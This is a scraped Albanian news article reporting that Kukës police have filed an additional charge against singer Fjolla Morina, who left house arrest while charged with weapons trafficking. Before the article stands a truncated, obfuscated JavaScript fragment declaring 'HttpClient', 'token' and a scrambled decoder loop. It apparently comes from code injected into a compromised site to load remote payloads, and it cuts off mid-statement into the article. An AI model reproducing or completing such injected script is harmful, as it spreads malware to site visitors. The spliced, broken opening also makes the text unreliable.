;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Ngritet një tjetër akuzë për Fjolla Morinën

By

Policia e Kukësit reagon pas “zhdukjes” së këngëtares Fjolla Morina, nën akuzë për “Trafikim të armëve dhe municioneve”.

34-vjeçarja ka shkelur masën e sigurës “arrest shtëpie”, vendosur nga Gjykata e Kukësit, dhe është larguar nga banesa.

Sipas policisë, këngëtarja tani do të akuzohet edhe për veprën penale “Largimi i të burgosurit nga vendi i qëndrimit“.

“Më datë 20.01.2021 u referuan materialet në Prokurorinë pranë Gjykatës së Shkallës së Parë Kukës, për veprën penale “Largimi i të burgosurit nga vendi i qëndrimit”, në ngarkim të shtetases F. M., 34 vjeçe, banuese në Prishtinë, e cila është me masë sigurie “Arrest në shtëpi”, të  caktuar nga Gjykata e Shkallës Parë Kukës, pasi gjatë kontrollit të ushtruar nga Policia nuk është gjetur në banesë. Po punohet për kapjen e saj”, njoftoi policia.

Artikuj të ngjashëm